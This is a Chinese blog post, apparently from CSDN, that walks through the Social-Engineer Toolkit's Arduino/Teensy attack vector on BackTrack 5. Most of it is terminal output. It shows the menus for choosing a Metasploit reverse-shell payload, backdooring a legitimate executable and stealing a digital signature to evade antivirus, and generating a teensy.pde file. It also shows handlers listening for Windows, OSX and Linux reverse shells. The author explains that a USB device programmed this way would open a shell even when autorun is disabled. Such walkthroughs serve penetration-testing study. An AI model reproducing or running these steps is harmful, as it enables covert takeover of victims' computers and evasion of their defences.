Arduino-Based Attack Vector

最新推荐文章于 2023-08-15 11:17:07 发布

feier7501

最新推荐文章于 2023-08-15 11:17:07 发布

阅读量3.4k

点赞数

分类专栏： backtrack SET metasploit

本文链接：https://blog.csdn.net/feier7501/article/details/9209297

版权

backtrack 同时被 3 个专栏收录

78 篇文章 0 订阅

订阅专栏

metasploit

73 篇文章 0 订阅

订阅专栏

SET

19 篇文章 0 订阅

订阅专栏

先要安装两个软件：

1、Download the Arduino Software

2、Download Teensyduino

另外，还要从http://www.pjrc.com/购买一个Teensy设备，16-24美元。我没有买，就记录一下过程。

软件安装过程：

arduino的安装很简单，只要一直点下一步就可以了。

teensyduino的安装如下：

必须是arduino的路径。

不知道选哪个，就全选，然后就开始安装了：

安装完毕后，打开软件，设置：

BT5上操作如下：

root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
      in the documentation and/or other materials provided with the distribution.
    * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
      this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are 
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting 
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Do you agree to the terms of service [y/n]: y



                         .--.  .--. .-----.
                        : .--': .--'`-. .-'
                        `. `. : `;    : :  
                         _`, :: :__   : :  
                        `.__.'`.__.'  :_;   

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1





             01011001011011110111010100100000011100
             10011001010110000101101100011011000111
             10010010000001101000011000010111011001
             10010100100000011101000110111100100000
             01101101011101010110001101101000001000
             00011101000110100101101101011001010010
             00000110111101101110001000000111100101
             10111101110101011100100010000001101000
             01100001011011100110010001110011001000
             00001110100010110100101001001000000101
             01000110100001100001011011100110101101
             11001100100000011001100110111101110010
             00100000011101010111001101101001011011
             10011001110010000001110100011010000110
             01010010000001010011011011110110001101
             10100101100001011011000010110101000101
             01101110011001110110100101101110011001
             01011001010111001000100000010101000110
             11110110111101101100011010110110100101
             11010000100000001010100110100001110101
             011001110111001100101010

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 6

 The Arduino-Based Attack Vector utilizes the Arduin-based device to
 program the device. You can leverage the Teensy's, which have onboard
 storage and can allow for remote code execution on the physical
 system. Since the devices are registered as USB Keyboard's it
 will bypass any autorun disabled or endpoint protection on the
 system.

 You will need to purchase the Teensy USB device, it's roughly
 $22 dollars. This attack vector will auto generate the code
 needed in order to deploy the payload on the system for you.

 This attack vector will create the .pde files necessary to import
 into Arduino (the IDE used for programming the Teensy). The attack
 vectors range from Powershell based downloaders, wscript attacks, 
 and other methods.

 For more information on specifications and good tutorials visit:

 http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

 To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
 Special thanks to: IronGeek, WinFang, and Garland

 This attack vector also attacks X10 based controllers, be sure to be leveraging
 X10 based communication devices in order for this to work.

 Select a payload to create the pde file to import into Arduino:

   1) Powershell HTTP GET MSF Payload
   2) WSCRIPT HTTP GET MSF Payload
   3) Powershell based Reverse Shell Payload
   4) Internet Explorer/FireFox Beef Jack Payload
   5) Go to malicious java site and accept applet Payload
   6) Gnome wget Download Payload
   7) Binary 2 Teensy Attack (Deploy MSF payloads)
   8) SDCard 2 Teensy Attack (Deploy Any EXE)
   9) SDCard 2 Teensy Attack (Deploy on OSX)
  10) X10 Arduino Sniffer PDE and Libraries
  11) X10 Arduino Jammer PDE and Libraries
  12) Powershell Direct ShellCode Teensy Attack

  99) Return to Main Menu

set:arduino>2
set> Do you want to create a payload and listener [yes|no]: : yes
set:payloads> Enter the IP address for the payload (reverse):192.168.1.11

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

set:payloads>2

Below is a list of encodings to try and bypass AV. 

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

set:encoding>16
set:payloads> PORT of the listener [443]:
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate

[*] PDE file created. You can get it under 'reports/teensy.pde' 
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino

[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...
resource (src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
[*] Started reverse handler on 192.168.1.11:8080 
[*] Starting the payload handler...
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > 
[*] Started reverse handler on 192.168.1.11:8081 
[*] Starting the payload handler...

已经开始监听了。

在/pentest/exploits/set/reports生成了teensy.pde：

root@bt:/pentest/exploits/set/reports# ls
teensy.pde

然后上传teensy.pde，报错：

硬件不支持，因为我没有购买那个硬件啊。

如果我有那个硬件的话，代码会上传到USB上面去，然后把USB插入windows，就算windows的自动播放功能被关闭了，也会和BT5建立反向连接，打开一个session，进而获得一个shell了。

feier7501

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Arduino-Based Attack Vector

先要安装两个软件：1、Download the Arduino Software2、Download Teensyduino另外，还要从http://www.pjrc.com/购买一个Teensy设备，16-24美元。我没有买，就记录一下过程。软件安装过程：arduino的安装很简单，只要一直点下一步就可以了。teensyduino的安装如下：
复制链接

扫一扫